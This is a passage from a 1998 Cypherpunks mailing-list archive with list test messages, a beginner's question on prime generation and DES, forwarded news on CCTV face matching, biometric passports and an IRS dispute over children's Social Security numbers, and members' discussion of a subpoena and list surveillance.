>I pledge to establish an award in Jon's name to recognize long-standing
>service to the community, the Jonathan B. Postel Service Award, which is
>awarded to Jon posthumously as its first recipient.
>
>If Jon were here, I am sure he would urge us not to mourn his passing
>but to celebrate his life and his contributions. He would remind us that
>there is still much work to be done and that we now have the
>responsibility and the opportunity to do our part. I doubt that anyone
>could possibly duplicate his record, but it stands as a measure of one
>man's astonishing contribution to a community he knew and loved.
>
-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 19 Oct 1998 03:53:48 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: CDR Node Test (no reply)
Message-ID: <199810181944.OAA03432@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test (no reply)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@www.video-collage.com>
Date: Mon, 19 Oct 1998 03:33:35 +0800
To: cypherpunks@Algebra.COM
Subject: test1
Message-ID: <199810181912.PAA26798@www.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



test1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve.benjamin@juno.com (Stephen Benjamin)
Date: Mon, 19 Oct 1998 03:49:05 +0800
To: cypherpunks@toad.com
Subject: 2 questions: Prime Numbers and DES
Message-ID: <19981018.151326.-968627.0.Steve.Benjamin@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




1.  How can I generate 2 large prime numbers?  I doubt I could create 2,
100-digit prime numbers in my head :-)

2.  Is there an implentation of DES in perl?  I didn't see a link to one
on the export-a-sig page.  If not perl, is there one for DOS?  I'm
looking for a bare bones one, not something with tons of features
and a GUI.  A perl or dos version of the unix "des" program would be
preferable.

Thanks!

Stephen Benjamin
Steve.Benjamin@juno.com

___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Oct 1998 10:16:18 +0800
To: cypherpunks@cyberpass.net
Subject: IP: 'Intelligent' computer matches mugshots w/ faces in a crowd
Message-ID: <199810190135.SAA29887@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: 'Intelligent' computer matches mugshots w/ faces in a crowd
Date: Sun, 18 Oct 1998 08:46:25 -0500
To: believer@telepath.com

Source:  Fox News - AP

'Intelligent' computer system matches mug shots with faces in a crowd
 9.22 p.m. ET (123 GMT) October 17, 1998

 LONDON (AP) - An "intelligent'' computer system that uses closed circuit
television to match faces in a crowd to mug shots of known criminals is
likely to become London's latest weapon against crime. 

 Scotland Yard and a local council have installed the $100,000 CCTV system
on a trial basis in Newham, a poor district in London's East End. 

 Newspapers reported Thursday that the computer system, called Mandrake, is
linked to 144 CCTVs in Newham's shopping centers, railway stations and car
parks and can scan up to 150 faces at a time and compare them with a
database of criminals stored on a computer at the council's headquarters. 

 If there is a match between a face in the crowd and a known criminal, the
computer alerts a monitoring team in the town hall, who in turn alert the
police. 

 Civil liberties groups said they were alarmed by the new system, but
police defended its use. 

 "The only people entered on to the system will be convicted criminals who,
through our intelligence, we believe are habitually committing crimes in
the area,'' The Daily Mail quoted police Chief Superintendent Dave Armond
as saying. "If people are not committing crime they have nothing to fear,
but if they are among the small minority who are, the message is, 'We are
watching out for you.''' 

 The newspaper reported that police initially will use the system to
concentrate on catching robbery suspects. In the future, however, it could
be used to search crowds for hooligans who stir up trouble at soccer matches. 

 CCTV's developer, Software and Systems International, says the system is
accurate enough to discern people hiding behind make-up or eye glasses. And
growing a beard won't help either, the company says. 

 Britain has 150,000 close circuit television cameras. While most Britons
appear happy the devices are being used to tackle crime, civil liberties
groups oppose both the cameras and the facial matching. 

 "The accuracy of facial mapping like this is limited. You only need a
handful of photographs of celebrities to see how different the same people
can look in different pictures,'' the Mail quoted Liz Parratt, spokeswoman
for Liberty, a civil rights group, as saying. "Even if you did have a
system which worked, it would have to be regulated very carefully to
protect people's privacy.'' 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Oct 1998 10:38:51 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: Plastic Passports w/Biometric Confirmation of ID
Message-ID: <199810190136.SAA29899@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: Plastic Passports w/Biometric Confirmation of ID
Date: Sun, 18 Oct 1998 10:01:41 -0500
To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=0GNxrbeq&atmo=99999
999&P4_FOLLOW_ON=/98/10/18/npass18.html&pg=/et/98/10/18/npass18.html

Credit card plastic passport to be issued within two years
 By David Bamber, Home Affairs Correspondent 

 A NEW credit card size passport which can be inserted in a computer
scanner on arrival in another country will be issued to British travellers
within two years.

 Trials are expected to begin soon of the system which allows passengers to
bypass traditional immigration officials. When entering a country
travellers would insert their plastic passport in a card reader and hold
their hands to a screen to check palm prints. Both would be linked to a
database containing travellers' details. The process would take 15 seconds
and make lengthy airport queues a thing of the past. A prototype card with
a digital photograph of the holder has already been developed.

 Passport Agency officials have been in discussions with the computer giant
IBM about their Fastgate card system which has already been installed in
Bermuda, a British colony. A passport agency official said: "It looks like
a credit card and it can be swiped through Customs and allow people to
enter a country without having their traditional passport examined by an
official." He said that the new prototype had a digital hologram photograph
of the holder and other special security devices which made forging them
difficult.

 Last night a Home Office official confirmed that the credit card-style
passport is being developed. He said: "We have become involved in the early
stages of exploring the IBM Fastgate system." The official said that no
date has yet been set to issue the cards to the public or to start trials
at an airport in the Britain.

 But Home Office sources have revealed that a trial of the system is likely
to be carried out by installing it at a Government building so that tests
can be carried out to see if the security system can be breached.

 John Tincey, technology officer of the Immigration Service Union which
represents 2,000 staff who check passports in Britain, said his members had
been aware for some time of discussions about a computerised credit card
style system. He has compiled a report for his union which was submitted to
the Home Office.

 In it, he concluded: "The new technology will save on running costs,
reduce staff numbers and increase profits. Even the Home Office will be
unable to resist the financial advantages of the new technology."

 He added that because so many other countries will introduce credit card
style systems, Britain would either lose business because of retaining
lengthy checks on travellers, or alternatively loosen controls by
selectively abandoning checks to minimise delays. Last night he also warned
of possible job losses and the danger that the cards could be open to
counterfeiting or abuse.

 At Bermuda International Airport, the Fastgate cards were introduced in
May. Travellers use a touch screen to answer a few simple questions. The
computer checks the data against information held on computers and also
makes sure there are no arrest warrants out or requests to intercept the
traveller. Usually the process takes just 15 seconds.

 Ken Thornton, of IBM, said: "Governments improve security and service.
Airports improve competitiveness. And airlines and card issuers improve
customers service." There is even the prospect of electronic visas being
issued in the future, either as separate credit card style documents or
logged on a computer.

 Even when the credit card style passports are introduced, the traditional
paper passports will still be issued for some time because many countries
will take years to install the necessary technology.

(c) Copyright of Telegraph Group Limited 1998.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Oct 1998 10:39:34 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("Kill Switch")
Message-ID: <199810190136.SAA29909@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("Kill Switch")
Date: Sun, 18 Oct 1998 16:38:53 EDT
To: ignition-point@majordomo.pobox.com

(I am posting just in case this wasn't already posted to the list..Mary)


Subject:         Evaluation of Vehicle Stopping Electromagnetic Prototype
Date:             Sat, 3 Oct 1998 23:34:20 -0400
From:            Matthew Gaylor <freematt@coil.com>
To:                Matthew Gaylor <freematt@coil.com>




[Note from Matthew Gaylor: Several years ago on this list I mentioned that
EMP devices will soon be used to stop car chases.  Several of my
subscribers wrote in and said I must be crazy, that I lived in a science
fiction fantasy.  Oh well, the future is now.]

>From the US Justice Dept.'s  NCJRS listservs <ncjrsadm@aspensys.com>

* Evaluation of Vehicle Stopping Electromagnetic Prototype
Devices: Phase III - Engineering Field Testing Solicitation

To curtail high-speed chases, NIJ is requesting applications
for prototype electromagnetic devices designed to stop motor
vehicles that are in motion. Approved applicants will
provide prototypes for field testing, with the hope of
proceeding to operational testing by law enforcement
agencies. The NIJ Solicitation, "Evaluation of Vehicle
Stopping Electromagnetic Prototype Devices: Phase III -
Engineering Field Testing," provides information on
application requirements and deadlines.

"Evaluation of Vehicle Stopping Electromagnetic Prototype
Devices: Phase III - Engineering Field Testing"
(Solicitation) (SL000298) is available on the NCJRS World
Wide Web site (http://www.ncjrs.org/txtfiles/sl298.txt)

**************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-30 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
Archived at http://www.reference.com/cgi-bin/pn/listarch?list=FA@coil.com
**************************************************************************



--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 19 Oct 1998 10:45:17 +0800
To: cypherpunks@cyberpass.net
Subject: IP: High-tech Anti-crime Computer Unveiled
Message-ID: <199810190136.SAA29919@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jan <igniting@flash.net>
Subject: IP: High-tech Anti-crime Computer Unveiled
Date: Sun, 18 Oct 1998 20:10:22 -0500
To: Ignition-Point <ignition-point@majordomo.pobox.com>

<center>The Associated Press

</center>

	LONDON --  An "intelligent" computer system that uses closed circuit
television to match faces in a crowd to mug shots of criminals is likely
to become London's latest weapon against crime.  

	Scotland Yard and a local council have installed the $100,000 CCTV
system for a trial in Newham, a poor district in London's East End.  

	Newspapers reported Thursday that the computer system, called Mandrake,
is linked to 144 CCTV's in shopping centers, railway stations and car
parks.  Mandrake can scan up to 150 faces at a time and compare them with
a database of criminal mug shots stored on a computer at council
headquarters.  

	If Mandrake makes a match between a face in the crowd and a criminal's
mug shot, the computer alerts a monitoring team in the town hall, which
alerts the police. 

 

	Civil liberties groups said they were alarmed by the new system, but
police defended its use.  


	"The only people entered on to the system will be convicted criminals
who, through our intelligence, we believe are habitually committing
crimes in the area,"  The Daily Mail quoted police Chief Superintendent
Dave Armond saying.  "If people are not committing crimes, they have
nothing to fear, but if they are among the small minority who are, the
message is, 'We are watching out for you'.  

	The newspaper reported that the police will initially use the system to
concentrate on catching robbery suspects.  However, in the future it
could be used to search crowds for hooligans who stir up trouble at
soccer matches.  

	CCTV's developer, Software and Systems International, said the system is
accurate enough to identify people hiding behind makeup or eyeglasses. 
Even growing a beard won't help, the company said.  

	Britain has 150,000 closed circuit TV cameras.  Although most Britons
are used to the devices, civil liberties groups oppose the cameras and
the facial matching.  

	"The accuracy of facial matching like this is limited.  You only need a
handful of photographs of celebrities to see how different the same
people can look in different pictures," the Mail quoted Liz Parratt,
spokeswoman for the civil rights group liberty, as saying.  "Even if you
did have a system which worked, it would have to be regulated very
carefully to protect people's privacy."



Transcribed by Ryan Wright from Sunday, Oct 18, 1998, Star Telegram, Fort
Worth Texas, Section A page 19



 ******=========================================*****

"Among the elementary measures the American Soviet government

 will adopt to further the cultural revolution are...

 [a] National Department of Education...the studies will be

 revolutionized, being cleansed of religious, patriotic, and

 other features of the bourgeois ideology. The students will

 be taught the basis of Marxian dialectical materialism,

 internationalism and the general ethics of the

 new Socialist society."

     - William Z. Foster,

       Toward Soviet America, 1932


"...Stage III...would proceed to a point where no state would

have the military power to challenge the progressively 

strengthened U.N. peace force...

The manufacture of armaments would be prohibited...

All other armaments would be destroyed..." 

    -Department of State publication number 7277



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 19 Oct 1998 11:21:08 +0800
To: Kevlar <webmaster@max-web.com>
Subject: Re: More on Postel
In-Reply-To: <36298670.B1A@att.com>
Message-ID: <v04003a00b2505a63c36d@[192.168.229.6]>
MIME-Version: 1.0
Content-Type: text/plain



>Damn. Talk about a blow to the heart.
>
>Where can I find more information about this great man and his
>achievements? Has there been any memorial web sites put up? I'de be happy
>to donate space on my server. Just e-mail me at god@max-web.com. Are there
>any news stories worth reading on this subject?

Try http://www.sjmercury.com/breaking/headline1/045392.htm

Posted at 5:31 p.m. PDT Saturday, October 17, 1998

Net pioneer Postel dies after surgery





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Mon, 19 Oct 1998 10:52:54 +0800
To: "'cypherpunks@toad.com
Subject: RE: 2 questions: Prime Numbers and DES
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD05@DINO>
MIME-Version: 1.0
Content-Type: text/plain
Title: RE: 2 questions: Prime Numbers and DES





> From: steve.benjamin@juno.com [mailto:steve.benjamin@juno.com]
> 
> 1.  How can I generate 2 large prime numbers?  I doubt I 
> could create 2,
> 100-digit prime numbers in my head :-)
> 
For cryptographic purposes, you'll want to use a probabilistic test. Try reading through these links...


http://www.utm.edu/research/primes/proving.html and...
http://www.itl.nist.gov/div897/pubs/fip186.htm 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 19 Oct 1998 09:09:57 +0800
To: jya@pipeline.com (John Young)
Subject: Re: What's up with algebra.com?
In-Reply-To: <199810182353.TAA07347@camel7.mindspring.com>
Message-ID: <199810190043.TAA03178@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



As far as algebra.com is concerned, the list went down because
my upstream site just installed anti-relaying rules, and everything
going to algebra.com was rejected. Also, sendmail was not setuid
and could not create mqueue files.

I wish I could boast receiving attention from the IRS/BATF or 
whatever, but so far i has not happened.

igor


John Young wrote:
> 
> 
> What with the Feds now going after CJ for attempted
> murder of federal officials (film ad overkill!), Jeff Gordon 
> soliciting cypherpunk subscribers to flesh that fancy, 
> and one CDR operator flattered with a subpoena, it'd be 
> prudent to have a way to check on whether a CDR node 
> has been taken down or turned, and the operator hogtied 
> with the system as evidence (or forced to run a sting to 
> gather it), before a clamp's put on telling what's going on.
> 
> May be too late, too late.
> 
> Recall it's a major offense for revealing placement of a 
> wiretap, surveillance or a covert investigation -- especially 
> if you're assisting, willingly or unwillingly.
> 
> Not that one should advocate hiding what might be construed
> as evidence or exposing underbelly work that's ordered concealed. 
> Why that might be taken to be pushing a conspiracy against 
> WMD-crazed authority rather than promoting personal hygiene 
> with lots of sunshine and vigorous exercise of rights to fanciful
> imaginings of what a world would be like without minders galore.
> 
> Whistling in the dark, mind you.
> 
> Consider that there are 118,000 federal prisoners. That's a very 
> big inhospitality business, and its growing, private and feds rubbing
> hands and futures. For an overview of exactly how the chain 
> operates (in case you're planning a stay or a stock buy) gander 
> the list of its bountiful rules and regs:
> 
>    http://jya.com/bop-progstat.htm
> 
> Inmates are forbidden access to the Internet (PS 1241.02 Internet
> and the World Wide Web), however, they are encouraged to do 
> creative writing (PS 5350.07 Inmate Manuscripts), so Jim Bell,
> CJ and a few of us deserve a suite overlooking the garden of
> evil.
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Oct 1998 08:41:48 +0800
To: cypherpunks@toad.com
Subject: Re: What's up with algebra.com?
In-Reply-To: <199810181651.LAA00864@einstein.ssz.com>
Message-ID: <199810182353.TAA07347@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



What with the Feds now going after CJ for attempted
murder of federal officials (film ad overkill!), Jeff Gordon 
soliciting cypherpunk subscribers to flesh that fancy, 
and one CDR operator flattered with a subpoena, it'd be 
prudent to have a way to check on whether a CDR node 
has been taken down or turned, and the operator hogtied 
with the system as evidence (or forced to run a sting to 
gather it), before a clamp's put on telling what's going on.

May be too late, too late.

Recall it's a major offense for revealing placement of a 
wiretap, surveillance or a covert investigation -- especially 
if you're assisting, willingly or unwillingly.

Not that one should advocate hiding what might be construed
as evidence or exposing underbelly work that's ordered concealed. 
Why that might be taken to be pushing a conspiracy against 
WMD-crazed authority rather than promoting personal hygiene 
with lots of sunshine and vigorous exercise of rights to fanciful
imaginings of what a world would be like without minders galore.

Whistling in the dark, mind you.

Consider that there are 118,000 federal prisoners. That's a very 
big inhospitality business, and its growing, private and feds rubbing
hands and futures. For an overview of exactly how the chain 
operates (in case you're planning a stay or a stock buy) gander 
the list of its bountiful rules and regs:

   http://jya.com/bop-progstat.htm

Inmates are forbidden access to the Internet (PS 1241.02 Internet
and the World Wide Web), however, they are encouraged to do 
creative writing (PS 5350.07 Inmate Manuscripts), so Jim Bell,
CJ and a few of us deserve a suite overlooking the garden of
evil.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 19 Oct 1998 09:10:03 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What's up with algebra.com? (fwd)
Message-ID: <199810190102.UAA04158@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Oct 1998 19:44:37 -0400
> From: John Young <jya@pipeline.com>
> Subject: Re: What's up with algebra.com?

> What with the Feds now going after CJ for attempted
> murder of federal officials (film ad overkill!), Jeff Gordon 
> soliciting cypherpunk subscribers to flesh that fancy, 
> and one CDR operator flattered with a subpoena, it'd be 
> prudent to have a way to check on whether a CDR node 
> has been taken down or turned, and the operator hogtied 
> with the system as evidence (or forced to run a sting to 
> gather it), before a clamp's put on telling what's going on.

If anybody figures out a way to achieve such security I'd like to know.

As far as I know the only way to keep a box up is to be sure that there are
'works in progress' from users who are not directly involved in the
operation of the system. They are eligible for $1000/day each day they are
deprived of access without a warrant. If they are completely uninvolved it
*might* make a magistrate hesitate about generating a warrant.

As to my subpoena, it looks like I *may* have to do nothing more than sign an
affadavit saying that I didn't participate or discuss the above mentioned
issues with CJ when he was in Austin. I should know more later in the week.
I did find out that the reason they picked me was that when CJ was arrested
he happened to be carrying a copy of the post I did several months ago in
responce to a question regarding destroying floppy drives and computers
using a floppy disk. Apparently they thought I might be some sort of
mad-bomb designer or something. I have to assume that since I wasn't
arrested at the first interview they figured I was reasonably harmless
concerning assaults of the person or helping CJ in a material way.

As to there being wiretaps and permanent LEA monitors on the list, you betcha.

> May be too late, too late.

Sigh.

> Recall it's a major offense for revealing placement of a 
> wiretap, surveillance or a covert investigation -- especially 
> if you're assisting, willingly or unwillingly.

They can take SSZ down or run it themselves (hope they got somebody that
knows Linux 1.1.59 cause otherwise they won't be running it for long) but I
won't participate in entrapment. And I suspect, though I don't know, that my
arrest and lack of interaction with other users would set off flairs pretty
quickly in that case. How long it might take to percolate back to Cypherpunks
I don't have a clue.

One major aspect of all this that I have found particularly unsettling is
that I really don't have family or anybody for support. I think about the
only thing worse than imagining oneself sitting in a jail with no hope of
visitors, letters, etc. is a funeral with nobody there but the preacher.

On a related issue, I have found it somewhat amusing that all the Austin
Cpunks have scattered like a covey of quail. Only one of them even offered
to help (Muchas gracias for the lawyer referals!). I had one person call and
make sure that I knew they weren't at the meeting CJ attended. I'm seriously
considering dropping sponsorship of the local group (and I sure as hell won't
stop to help fix a flat now).

> Consider that there are 118,000 federal prisoners. That's a very 

That means there are over 900,000 state, country, and municipal prisoners
since there are over 1M in jail today. 

For a democracy that's incredibly damning. Legalize consenual crimes!


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------

ps not crypto related but if you're a science book hound, check out:

Elementary Mechanics of Fluids
H. Rouse
ISBN 0-486-63699-2 (Dover)
$11.95

Physics by example: 200 problems and solutions
WG Rees
ISBN 0-521-44975-8
$? (I bought my copy used)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 19 Oct 1998 09:12:02 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What's up with algebra.com? (fwd)
Message-ID: <199810190106.UAA04261@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: What's up with algebra.com?
> Date: Sun, 18 Oct 1998 19:43:46 -0500 (CDT)
> From: ichudov@algebra.com (Igor Chudov @ home)

> As far as algebra.com is concerned, the list went down because
> my upstream site just installed anti-relaying rules, and everything
> going to algebra.com was rejected. Also, sendmail was not setuid
> and could not create mqueue files.

Hmm. Interesting. The errors I was recieving were from algebra.com and it
complained of unknown user cypherpunks.

> I wish I could boast receiving attention from the IRS/BATF or 
> whatever, but so far i has not happened.

You're welcome to mine...:)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 19 Oct 1998 10:17:05 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: Plastic Passports w/Biometric Confirmation of ID
Message-ID: <v04020a04b2504b126ca0@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 18 Oct 1998 10:01:41 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Tracking: Plastic Passports w/Biometric Confirmation of ID
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=0GNxrbeq&atmo=99999
999&P4_FOLLOW_ON=/98/10/18/npass18.html&pg=/et/98/10/18/npass18.html

Credit card plastic passport to be issued within two years
 By David Bamber, Home Affairs Correspondent

 A NEW credit card size passport which can be inserted in a computer
scanner on arrival in another country will be issued to British travellers
within two years.

 Trials are expected to begin soon of the system which allows passengers to
bypass traditional immigration officials. When entering a country
travellers would insert their plastic passport in a card reader and hold
their hands to a screen to check palm prints. Both would be linked to a
database containing travellers' details. The process would take 15 seconds
and make lengthy airport queues a thing of the past. A prototype card with
a digital photograph of the holder has already been developed.

 Passport Agency officials have been in discussions with the computer giant
IBM about their Fastgate card system which has already been installed in
Bermuda, a British colony. A passport agency official said: "It looks like
a credit card and it can be swiped through Customs and allow people to
enter a country without having their traditional passport examined by an
official." He said that the new prototype had a digital hologram photograph
of the holder and other special security devices which made forging them
difficult.

 Last night a Home Office official confirmed that the credit card-style
passport is being developed. He said: "We have become involved in the early
stages of exploring the IBM Fastgate system." The official said that no
date has yet been set to issue the cards to the public or to start trials
at an airport in the Britain.

 But Home Office sources have revealed that a trial of the system is likely
to be carried out by installing it at a Government building so that tests
can be carried out to see if the security system can be breached.

 John Tincey, technology officer of the Immigration Service Union which
represents 2,000 staff who check passports in Britain, said his members had
been aware for some time of discussions about a computerised credit card
style system. He has compiled a report for his union which was submitted to
the Home Office.

 In it, he concluded: "The new technology will save on running costs,
reduce staff numbers and increase profits. Even the Home Office will be
unable to resist the financial advantages of the new technology."

 He added that because so many other countries will introduce credit card
style systems, Britain would either lose business because of retaining
lengthy checks on travellers, or alternatively loosen controls by
selectively abandoning checks to minimise delays. Last night he also warned
of possible job losses and the danger that the cards could be open to
counterfeiting or abuse.

 At Bermuda International Airport, the Fastgate cards were introduced in
May. Travellers use a touch screen to answer a few simple questions. The
computer checks the data against information held on computers and also
makes sure there are no arrest warrants out or requests to intercept the
traveller. Usually the process takes just 15 seconds.

 Ken Thornton, of IBM, said: "Governments improve security and service.
Airports improve competitiveness. And airlines and card issuers improve
customers service." There is even the prospect of electronic visas being
issued in the future, either as separate credit card style documents or
logged on a computer.

 Even when the credit card style passports are introduced, the traditional
paper passports will still be issued for some time because many countries
will take years to install the necessary technology.

(c) Copyright of Telegraph Group Limited 1998.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 19 Oct 1998 11:21:28 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] All IRS appeals are exhausted, SSNs required for children
Message-ID: <v04020a06b2504bf6a254@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 18 Oct 1998 12:25:38 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: [FP] All IRS appeals are exhausted, SSNs required for children
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Forwarded:
---------------

From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] All IRS appeals are exhausted, SSNs required for children
Date: Sun, 18 Oct 1998 11:20:17 -0500

======================================================================
SCAN THIS NEWS
10/18/98

Claiming children on tax returns without SSNs

The following exchange is typical with regard to claiming children as
deductions on federal tax returns. Names have been removed, but this is a
real case. Regardless of how you feel about income taxes, the point is that
the federal government no longer recognizes your children as being "yours"
unless they have a Social Security Number assigned to them.

More on the history of the requirement for children to be assigned SSNs (as
a provision under the GATT agreement) in order for them to be acknowledged
by the federal government can be found at:

http://www.networkusa.org/fingerprint/page1/fp-gatt-ssn-requirements.html

Scott

--------------------------------------------

Subject: All IRS appeals are exhausted; US District Court, next step, SSNs
for children

[Name removed]

As you may be aware, we did not supply IRS with Social Security numbers
for our dependent children, which resulted in IRS disallowing our
dependents, and we then had to pay substantially more income taxes.

We appealed, using various Biblical and legal arguments, which IRS
refused.

We then filed a 1040X, wherein we requested a refund for the extra
income tax we paid, since our dependents were disallowed and we had to
pay more money.

IRS told us that, in the explanation section, it was very important
we explain why we failed to include social security numbers for our
dependents, since our religious objections would be grounds upon which
we could sue IRS for First Amendment issues. Accordingly, in the
Explanation section, we included the following statement:

    Lack of Social Security Numbers for Children, Lines 4 & 5, 25, 28,
    & 30, particularly 30b. For religious reasons, our children do not
    have Social Security Numbers. Our legal and religious reasons are
    explained in the document in your possession titled: Appeal, dated
